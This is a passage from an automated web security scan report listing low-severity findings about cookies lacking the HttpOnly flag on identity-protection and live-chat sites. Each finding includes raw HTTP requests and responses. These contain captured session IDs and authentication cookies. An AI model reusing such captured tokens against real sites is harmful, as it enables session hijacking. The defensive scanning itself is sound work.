The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A?cust=SUZE%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-09-59CD1 HTTP/1.1
Host: roia.biz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roia1066=1BNctFRX773iepE2VRhbwPOSVgDrhBAAGKcXhpZGYgOTAzMjMwMDUzQ0QxAEQJKbMxVQAAhsNJrcHW800AAPyeczIxMwBDAAAFcEIAAKxFTwAABCo

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 24 Apr 2011 03:10:01 GMT
Content-Type: text/plain
Connection: close
P3P: policyref="http://roia.biz/w3c/p3p.xml", CP="NOI DSP COR CURa OUR BUS NAV STA"
Set-Cookie: roia1066=1Bu97lXL1iQIPMiKI4F1LVeE8263ZBAAGKcXhTVVpFIGdpZDlhIGlkZW50aXR5IHRoZWZ0IHJlc291cmNlX29yZGVyaW5nMzQtLTIwMTEtMDQtMjMtLTIwLTA5LTU5Q0QxAEQJKbM4VQAAiOpJrcHW800AAPyeczIxMwBDAAAFcEIAAK6_TwAABCo; path=/im; expires=Mon, 23-Apr-2012 03:10:01 GMT
Pragma: no-cache
Cache-control: no-cache
Location: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
Content-Length: 0
Expires: Sun, 24 Apr 2011 03:10:01 GMT


14.56. http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://roia.biz
Path:   /im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A?cust=idf%20903230053CD1 HTTP/1.1
Host: roia.biz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 24 Apr 2011 03:09:54 GMT
Content-Type: text/plain
Connection: close
P3P: policyref="http://roia.biz/w3c/p3p.xml", CP="NOI DSP COR CURa OUR BUS NAV STA"
Set-Cookie: roia1066=1BNctFRX773iepE2VRhbwPOSVgDrhBAAGKcXhpZGYgOTAzMjMwMDUzQ0QxAEQJKbMxVQAAhsNJrcHW800AAPyeczIxMwBDAAAFcEIAAKxFTwAABCo; path=/im; expires=Mon, 23-Apr-2012 03:09:54 GMT
Pragma: no-cache
Cache-control: no-cache
Location: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Content-Length: 0
Expires: Sun, 24 Apr 2011 03:09:54 GMT


14.57. http://sales.liveperson.net/hc/71003277/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagStartPage&lpCallId=565276490757-576158150099&protV=20&lpjson=1&page=http%3A//www.hotelclub.com/ManageBooking.asp&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-hotelclub-chat-en&activePlugin=none&cobrowse=true&PV%21unit=hotelclub-chat&PV%21visitorActive=1&SV%21language=en&title=View/Cancel%20Your%20Booking&referrer=http%3A//www.hotelclub.com/&cookie=HTC%3DAppVer%3D1%252E0%3B%20anon%3D1129876971252011042422094%3B%20ASPSESSIONIDCCQRQCTQ%3DFDCOCPBANKNGOIFKLDNNOFAM%3B%20s_vi%3D%5BCS%5Dv1%7C26DA09858516231B-400001A4A00530FD%5BCE%5D%3B%20WT_FPC%3Did%3D173.193.214.243-2165807168.30147192%3Alv%3D1303643486711%3Ass%3D1303643390479%3B%20s_cc%3Dtrue%3B%20s_lp%3Dno%3B%20s_sq%3D%255B%255BB%255D%255D HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5427601522506632860; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:11:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277
Set-Cookie: LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; expires=Mon, 23-Apr-2012 12:11:31 GMT; path=/hc/71003277; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:11:31 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"565276490757-576158150099","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

14.58. http://sales.liveperson.net/hc/71003277/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=609040248906-708747063996&protV=20&lpjson=1&id=2386500579&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5427601522506632860; LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; HumanClickSiteContainerID_71003277=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:13:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1303647201834; expires=Mon, 25-Apr-2011 12:13:21 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:13:21 GMT
Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27397

lpConnLib.Process({"ResultSet": {"lpCallId":"609040248906-708747063996","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

14.59. http://sales.liveperson.net/hc/71003277/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=745409803464-13586354209&protV=20&lpjson=1&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:11:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=2881751932682469133; path=/hc/71003277
Set-Cookie: HumanClickACTIVE=1303647090025; expires=Mon, 25-Apr-2011 12:11:30 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:11:30 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27396

lpConnLib.Process({"ResultSet": {"lpCallId":"745409803464-13586354209","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...

14.60. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

14.61. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002776876=100000002776876%2cFk1AcrNuu6ExBXgm0keyztjSFMM%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002776876=100000002776876%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvZN%2blny%2bAWBcNcgTgEYQTAn%2f5Qm%2ffFEPfXIv63cZlJiaE%2fMDdSGnMW%2fXgGZuQixVSag%0aE8V2RkfRemX3JuHpY1f44dEyBWljB5jE7W5JcSzsAjumrm2fXxlhGQX6XF9b5f6GKyQ%2fwj5G0ndt%0aS7FTQyrm; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:32:52 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff
Set-Cookie: WC_AUTHENTICATION_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


14.62. https://secure.lifelock.com/enrollment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

14.63. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:50 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:23:50 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=f6b470b0990eff9da9ecc49d049f8b7d5438784dc7b0156d4db397c6; Path=/
Vary: Accept-Encoding
Content-Length: 45537


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

14.64. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:53 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:18:53 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=a42f38caea98de40600af4324215a09331f2a75f23110e424db3969d; Path=/
Vary: Accept-Encoding
Content-Length: 3810


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

14.65. https://secure.lifelock.com/scripts/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /scripts/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/global.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
